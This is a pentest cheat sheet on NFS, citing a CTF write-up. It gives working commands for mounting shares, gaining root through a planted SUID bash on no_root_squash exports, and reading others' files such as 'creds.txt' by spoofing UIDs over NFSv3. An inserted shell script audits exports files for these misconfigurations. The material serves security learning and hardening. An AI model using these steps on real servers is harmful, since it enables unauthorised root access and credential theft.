# TCP 2049: NFS

> Network File System is a distributed file system protocol originally developed by Sun Microsystems in 1984, allowing a user on a client computer to access files over a computer network much like local storage is accessed.
>
> \-- [*Wikipedia*](https://en.wikipedia.org/wiki/Network_File_System)

## Basics

List the shares exported by the server

```bash
sudo showmount -e <ip>
```

Mount

```bash
sudo mkdir /mnt/<share>
sudo mount <ip>:/<share> /mnt/<share>
```

## Privilege escalation via root\_squash

When `root_squash` is enabled (the default), requests arriving from a client's root user are mapped to the unprivileged "nfsnobody"/"nobody" account, so remote root has the least local privileges on the share. When the export is configured with `no_root_squash`, a client's root keeps UID 0 on the share: one can upload a root-owned SUID binary and execute it on the target.

e.g. using bash (on the attacking machine, inside the mounted share)

```bash
# use a bash binary compatible with the target system (same arch/libc)
cp /bin/bash /mnt/<share>/bash
cd /mnt/<share>
sudo chown root bash
sudo chmod +sx bash   # setuid bit + executable
```

On the target, as any local user who can reach the share

```bash
./bash -p   # -p keeps the effective UID (root) instead of dropping it
```
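A defender's counterpart to the misconfiguration above, added here as an example that is not part of the original cheat sheet: a small POSIX shell audit of an `/etc/exports` file that flags `no_root_squash`, `insecure`, and exports open to every host (including the `/dir (rw)` form). The sample exports content it writes is constructed, not taken from any real host.

```shell
# Added example: audit an NFS exports file for the settings this page abuses.
# Flags no_root_squash (a client's root keeps uid 0, so the SUID drop works),
# insecure (requests accepted from unprivileged source ports) and exports open
# to any host, including the "/dir (rw)" form that exports to everyone.
# Usage: audit_exports /etc/exports   (prints one RISK line per finding)

audit_exports() (
    set -f   # no globbing: client specs contain '*'
    sed 's/#.*//' "$1" | while read -r path clients; do
        [ -z "$path" ] && continue
        # a path with no client list at all is exported to everyone
        [ -z "$clients" ] && clients='*'
        for spec in $clients; do
            client=$(printf '%s' "$spec" | cut -d'(' -f1)
            opts=$(printf '%s' "$spec" | sed -n 's/^[^(]*(\(.*\))$/\1/p')
            [ -z "$client" ] && client='*'   # "(rw)" alone means all hosts
            case "$client" in
                '*') echo "RISK $path $client exported to any host" ;;
            esac
            case ",$opts," in
                *,no_root_squash,*) echo "RISK $path $client no_root_squash" ;;
            esac
            case ",$opts," in
                *,insecure,*) echo "RISK $path $client insecure ports allowed" ;;
            esac
        done
    done
)

# number of findings, usable as pass/fail in a hardening check
count_export_risks() {
    audit_exports "$1" | wc -l | tr -d ' '
}

# constructed sample exports file (not from any real host) for a dry run
write_sample_exports() {
    cat > "$1" <<'EOF'
/srv/public   *(ro,sync)
/srv/backup   10.0.0.0/24(rw,sync,no_root_squash)
/srv/home     (rw)
/srv/safe     10.0.0.5(rw,sync,root_squash)
/srv/legacy   192.168.1.0/24(rw,insecure) 10.0.0.7(rw)
EOF
}

SAMPLE="${TMPDIR:-/tmp}/exports.sample"
write_sample_exports "$SAMPLE"
audit_exports "$SAMPLE"
```

Run it against the real `/etc/exports` on an NFS server and a non-zero `count_export_risks` tells you the share would be exposed to the root_squash bypass above; `exportfs -v` shows the effective options if the file uses defaults.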

## Exploitation

If a listing of the mounted share shows the owner as "65534 / nobody" or "4294967294 / UNKNOWN", NFSv4 ID mapping is hiding the real numeric owner of the file

```
-rwx------ 1 nobody 4294967294   48 Oct 28  2019 creds.txt
```

Mount the share again with NFS version 3, which reports the raw numeric UID/GID instead of mapped names

```bash
sudo mount -t nfs -o vers=3 <ip>:/<share> /mnt/<share>
```

```
-rwx------ 1 1014 1014   48 Oct 28  2019 creds.txt
```

Now all that is left is to create a local user with that UID (and a group with that GID), then access the file as that user

```bash
sudo groupadd --gid 1014 nfsgroup
sudo useradd --uid 1014 --gid nfsgroup --no-create-home nfsuser
sudo -u nfsuser ls -l /mnt/<share>
sudo -u nfsuser cat /mnt/<share>/creds.txt
```

Source: [Write-up Vulnix - playing around with NFS - Christophe Tafani-Dereeper](https://blog.christophetd.fr/write-up-vulnix/)
